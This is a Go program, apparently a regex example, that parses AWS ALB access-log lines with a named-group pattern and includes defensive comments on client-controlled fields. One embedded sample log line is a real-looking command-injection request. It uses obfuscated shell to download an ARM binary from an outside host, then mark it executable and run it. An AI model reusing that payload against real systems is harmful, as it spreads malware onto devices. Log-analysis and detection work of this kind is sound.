package main
import (
"regexp"
"fmt"
)
// main compiles a named-group pattern for AWS ALB access-log lines and prints
// every full-line match found in an embedded sample, with its ordinal position
// in the result slice (not its byte offset in the input).
//
// Review notes for anyone reusing this pattern in a detection pipeline:
//   - The request and user-agent fields come from the client. The sample below
//     includes a request that carries unescaped double quotes, so quotes inside
//     a field cannot be assumed to be escaped.
//   - FindAllString silently skips lines that do not match. Compare the match
//     count against the input line count so unparsed lines are reviewed rather
//     than lost.
//   - Matches are printed raw. Escape control characters (for example with %q)
//     before showing log content in a terminal or forwarding it downstream.
func main() {
	// The pattern is assembled from one fragment per field; the concatenation
	// is byte-identical to a single-literal pattern. Go's regexp package
	// matches in time linear in the input, so the lazy `.*?` below is not a
	// backtracking-blowup concern.
	const pattern = `(?m)^(?P<alb_type>(https?|h2|wss?))\s*` +
		`(?P<alb_timestamp>[^\s]+)\s*` +
		`(?P<alb_elb>[^\s]+)\s*` +
		`(?P<alb_client_addr>[^:]+):\s*` +
		`(?P<alb_client_port>[^\s]+)\s*` +
		// Only a literal "-" is accepted here, so entries that record a
		// target address will not match this pattern.
		`(?P<alb_target_addr>-)\s*` +
		`(?P<alb_request_processing_time>[^\s]+)\s*` +
		`(?P<alb_target_processing_time>[^\s]+)\s*` +
		`(?P<alb_response_processing_time>[^\s]+)\s*` +
		`(?P<alb_elb_status_code>[^\s]+)\s*` +
		`(?P<alb_target_status_code>[^\s]+)\s*` +
		`(?P<alb_received_bytes>[^\s]+)\s*` +
		`(?P<alb_sent_bytes>[^\s]+)\s*` +
		// Client-controlled. The lazy group ends at the first quote that is
		// followed by whitespace and another quote, so field boundaries after
		// a request containing quotes should be treated as unverified.
		`"(?P<alb_request>.*?)"\s+` +
		// Client-controlled. [^\"]+ rejects any user agent that contains a
		// double quote or is empty; such a line yields no match at all.
		`"(?P<alb_user_agent>[^\"]+)"\s*` +
		`(?P<alb_ssl_cipher>[^\s]+)\s*` +
		`(?P<alb_ssl_protocol>[^\s]+)\s*` +
		`(?P<alb_target_group_arn>[^\s]+)\s*` +
		`"(?P<alb_trace_id>[^\"]+)"\s*` +
		`"(?P<alb_domain_name>[a-zA-Z0-9\.\-:]+)"\s*` +
		`"(?P<alb_chosen_cert_arn>[^\"]+)"\s*` +
		`(?P<alb_matched_rule_priority>[^\s]+)\s*` +
		`(?P<alb_request_creation_time>[^\s]+)\s*\s*` +
		`"(?P<alb_actions_executed>[^\s]+)"\s*` +
		`"(?P<alb_redirect_url>[^\s]+)"\s*` +
		`"(?P<alb_error_reason>[^\"]+)"\s*` +
		`"?(?P<alb_target_port_list>[0-9 :\.-]+)"?\s*` +
		`"?(?P<alb_target_status_code_list>[0-9 -]+)"?`

	albLine := regexp.MustCompile(pattern)

	// Sample entries, one per line; every one has "-" as its target address.
	// They are data only and are never executed or fetched by this program.
	const sample = `https 2020-04-16T22:12:33.005975Z app/4da01abcd-prod-mer-c3e3/5b28cd8a0000e9ade 12.20.0.124:40802 - -1 -1 -1 400 - 163 288 "POST http://4da14ddd-prod-mergedextern-c3e3-212123456.us-east-1.elb.amazonaws.com:80/form/admin/formPin HTTP/1.1" "polaris botnet" - - - "-" "-" "-" - 2020-04-16T22:12:33.005000Z "-" "-" "-" "-" "-"
http 2020-04-16T22:58:45.017441Z app/4da14ddd-prod-mer-c3e3/7f28ba8e991e9ade 89.12.16.13:52263 - -1 -1 -1 400 - 266 288 "POST http://3ca14abc-prod-mer-c3e3-2129123456.us-east-1.elb.amazonaws.com:80/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh$"cd${IF}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IF}busybox${IFS}cget${IFS}http://19ce0f.grok.im/arm7;${IFS}chmod${IFS}77${IFS}arm7;${IFS}./arm7"%0A%2&logUser=a&loginPwd=a HTTP/1.1" "-" - - - "-" "-" "-" - 2020-04-16T22:58:45.017000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:03:31.610273Z app/4da10abc-prod-mer-c3e3/7f28ba8e881e0ade 74.7.15.100:33766 - -1 -1 -1 400 - 0 0 "- https://4da14eee-prod-mer-c3e3-2129577269.us-east-1.elb.amazonaws.com:443- -" "-" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - "-" "-" "arn:aws:acm:us-east-1:57257000000:certificate/ae07b666-1ee3-4b79-bde5-022ddee00a21" - 2020-04-17T00:03:31.610000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:03:30.285233Z app/4da1eeee-prod-mer-c0a0/7f28ba8e000e9adf 604.2.14.6:33547 - -1 -1 -1 400 - 0 0 "- https://4da14ddd-prod-mergedextern-c3e3-2129123456.us-east-1.elb.amazonaws.com:443- -" "-" ECDHE-RSA-AES128-SHA TLSv1 - "-" "-" "arn:aws:acm:us-east-1:572571234567:certificate/ae07b36f-1463-4b79-bdc5-922ddee87a31" - 2020-04-17T00:03:30.285000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:05:41.560192Z app/4da00eee-prod-mer-c3e3/7f28ba8e991e9ade 209.17.96.66:54201 - -1 -1 -1 404 - 139 167 "GET https://34.202.223.200:443/ HTTP/1.1" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - "Root=1-5e98d123c-ea7e5a803e7abcab79cb0772" "3.102.123.345:443" "arn:aws:acm:us-east-1:572512345678:certificate/ae07a00c-1426-4b00-bdc5-123abce87a31" 0 2020-04-17T00:05:41.560000Z "fixed-response" "-" "-" "-" "-"
`

	// -1 requests every non-overlapping match rather than a capped number.
	hits := albLine.FindAllString(sample, -1)
	for n := 0; n < len(hits); n++ {
		fmt.Println(hits[n], "found at index", n)
	}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Golang, please visit: https://golang.org/pkg/regexp/